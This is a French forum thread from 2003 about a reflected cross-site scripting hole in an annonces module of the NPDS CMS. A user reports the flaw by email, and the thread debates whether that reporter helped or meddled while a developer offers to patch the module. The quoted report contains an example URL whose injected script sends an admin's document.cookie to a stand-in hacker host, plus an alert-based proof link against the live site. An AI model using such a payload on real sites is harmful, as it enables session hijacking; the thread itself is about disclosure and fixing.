|
aidadomicil
 3011 
|  Posté : 21-06-2003 11:04
message reçu via le formulaire du site:
**** Message *****
>From : nosp1@hotmail.com
Code : 75000
Sujet : problème de sécurité
Msg : Bonjour,
Il semblerait qu\'il existe un problème de sécurité sur votre site en effet la variable : \"categorie\" dans module.php ne semble pas être défini par défaut et de surcroit pas modifié en passant dans les formulaire avec htmlspecialchars par exemple de plus cette variable étant active sur la page grace à un echo, je suppose, elle permet de faire executer du javascrit à celle-ci. Tout ceci ajouté à une identification permettrait à une personne mal intentionné de récupérer un cookie d\'un admin du site, grace à un mail malformé ou suivi d\'un lien du genre http://www.lesite.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>windowd.location.replace(\'http://www.hacker.com\'+!document.cookie!);</script>&num_ann=5
En espératn à vous avoir aidé quelques peu.
Cordialement
NoSP
Le lien ci-dessous ne fais rien d\'autre que d\'afficher votre cookie sur la page si vous êtes identifié, il est destiné à vous montrer le problème :
http://www.aidadomicil.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>alert(!document.cookie!)</script>&num_ann=5
**** Fin du message **** |
 Profil  www 
|
|
aidadomicil
3011
| Posté : 21-06-2003 11:19
y commencent à faire ch...r tous ces redresseurs de sites... on ne leur demande rien de quoi se mèlent-ils... j'ai installé ipban de la v5.0 et bloqué le dns du gus |
Profil www
|
|
aidadomicil
3011
| Posté : 21-06-2003 15:02
Copie de la réponse faite au gugusse:
Si nous avons besoin d'un audit de sécurité sur notre site internet, nous en ferons volontairement la démarche auprès d'un service spécialisé, en supposant que cela en vaille la peine. Qui y a-t-il à prendre ou à détruire sur Aid@domicil ? en admettant que celà soit possible, pensez-vous que l'on puisse mettre un baton de dynamite sur le serveur qui nous héberge?
N'avez-vous pas d'autres sites à taquiner ? Un gros site professionnel par exemple, ce serait probablement plus intéressant, non ? Pourquoi emmerder des sites comme le nôtre ?
Pour la peine de nous avoir pollué notre samedi matin, nous considérons votre action comme une tentative d'intrusion et de destruction de nos données placée chez notre hébergeur. Nous conservons les logs de votre passage et de vos actions et en informerons votre fournisseur d'accès. Nous avons l'intention de déposer plainte dès que vos coordonnées personnelles nous serons connues.
Cette plainte n'aboutira probablement pas, mais elle vous obligera à donner des explications auprès des autorités de police ou de gendarmerie, pendant ce temps-là vous vous ne nuirez à personne.
A ne plus vous revoir sur notre site...
|
Profil www
|
|
Xargos
2035
| Posté : 21-06-2003 15:51
C'est pas très sympa tout ça... le type en question n'avait visiblement pas de mauvaises intentions et voulait juste t'aider à corriger la faille avant qu'un vrai pirate méchant ne s'en prenne réellement au site. Même si tu ne comptes pas t'occuper du bug, tu aurais au moins pu le remercier de t'avoir prévenu... |
Profil  E-mail www
|
|
aidadomicil
3011
| Posté : 21-06-2003 15:55
j'ai pour habitude d'essayer de n'emmerder personne et j'aimerais bien que les gens fassent pareil pour moi... |
Profil www
|
|
Xargos
2035
| Posté : 21-06-2003 16:18
Je suis d'accord. Mais je pense que le gus en question voulait bien faire et qu'il n'avait pas l'intention de t'emmerder mais de t'aider. |
Profil E-mail www
|
|
axel
10065
| |
aidadomicil
3011
| Posté : 21-06-2003 16:40
heh j'ai pas le droit d'être de mauvaise foi ???
je pense avoir joué mon rôle, j'ai transmis l'info à Dev via ce forum et à la communauté, à mon hébergeur à toutes fins utiles et espère avoir perturbé le gugusse pour qu'il aille faire ses éssais de hack ailleurs que chez moi.
Avec ses co...ries, j'ai fermé l'inscription aux membres et bloqué son DNS, comme ça je me bloque l'accès de tous ceux qui viennent du même fournisseur d'accès que lui et il faudrait que je sois content, et ben non je ne le suis pas et je le lui fait remarquer, c'est tout! |
Profil www
|
|
developpeur
24581
| Posté : 21-06-2003 17:17
aida : refile moi le dernier niveau du module annonce que je vérifie le niveau de sécurité. Je modifie cela et te le renvoi immédiatement, comme cela le trou de ce module sera fermé.
On fera une MAJ de modules.npds.org avec cela
Je ne pense pas que le gus te voulais du mal mais il vos mieux sécurisé ce module effectivement.
A suivre
|
Profil E-mail www
|
|
aidadomicil
3011
| Posté : 21-06-2003 17:31
ok je te le maile |
Profil www
|
|
PSTL
2716
| Posté : 22-06-2003 17:56
Pour le module en question j'ai passé la main a glolo et lolo le temps pour moi de refaire surface.
Ils sont en train de fignoler la nouvelle version à sortir et si faille il y a le mieux serait de les en informer dans le forum du module (si cela n'est pas déjà fait )
|
Profil E-mail
|
|
aidadomicil
3011
| Posté : 22-06-2003 18:23
c'est pas le même que le tien, Pstl, t'inquiète pas |
Profil www
|
|
PSTL
2716
| Posté : 22-06-2003 22:13
ok oui je me rappelle 
A voir qd meme si ce pb peut pas concerner d'autres modules d'annonces un peu similaires |
Profil E-mail
|
|
aidadomicil
3011
| Posté : 23-06-2003 00:27
sûrement et pas que les annonces! |
Profil www
|
|
rolmops
4
|  Posté : 25-06-2003 02:03
J'arrive comme un cheveux sur la soupe mais personnelement je penses que ce gus ne te voulait pas de mal puisqu'il te met au courant du probleme. Je rajouterais de surcroit qu'il est heureux qu'il existe des personnes de ce genre pour mettre en avant des failles pouvant etres reprises par des personnes moin bien intentionnées .
Sans cette intervention ce probleme serait passé inapercu pendant combien de temps ?
Finalement il fait avancer le shmilblick a sa facon 
[ Message édité par : rolmops : 25-06-2003 02:15 ] |
Profil www
|
|
| Aller à la page : [ 1 | 2 | 3 ] | |
Dev 
|
Charte|
Nous contacter|CNIL : 873057|Logiciel sous licence GNU/GPL|
.:Page >> Super-Cache:.